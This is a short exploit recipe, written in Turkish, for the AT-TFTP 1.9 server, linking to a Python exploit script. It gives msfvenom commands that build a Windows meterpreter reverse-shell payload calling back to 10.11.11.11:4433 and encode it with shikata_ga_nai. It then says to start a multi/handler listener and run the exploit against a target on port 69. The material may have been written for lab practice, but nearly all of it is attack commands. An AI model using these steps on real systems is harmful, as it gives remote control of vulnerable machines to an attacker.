# at-tftp server 1.9

[Python Exploit File ](https://gist.github.com/AfroThundr3007730/bc29e9f3475401657b2dc1aa97142545)

```
# printf '\x81\xec\xac\x0d\x00\x00' > payload
# msfvenom -p windows/meterpreter/reverse_nonx_tcp LHOST=10.11.11.11 LPORT=4433 -a x86 --platform Windows -e generic/none -f raw >> payload

Aşağıdaki komut ile beraber çıkan çıktıyı python dosyasında yer alan payload değişkenine set et.
# cat payload | msfvenom -p - -e x86/shikata_ga_nai -b "\x00" -f c -e x86/shikata_ga_nai -a x86 --platform Windows


Daha sonra multi/handler üzerinden port dinleme moduna alınır ve aşağıdaki komut ile python dosyası çalıştırılır.
# python telesynftp.py 10.11.11.13 69 10.11.11.11 10
```
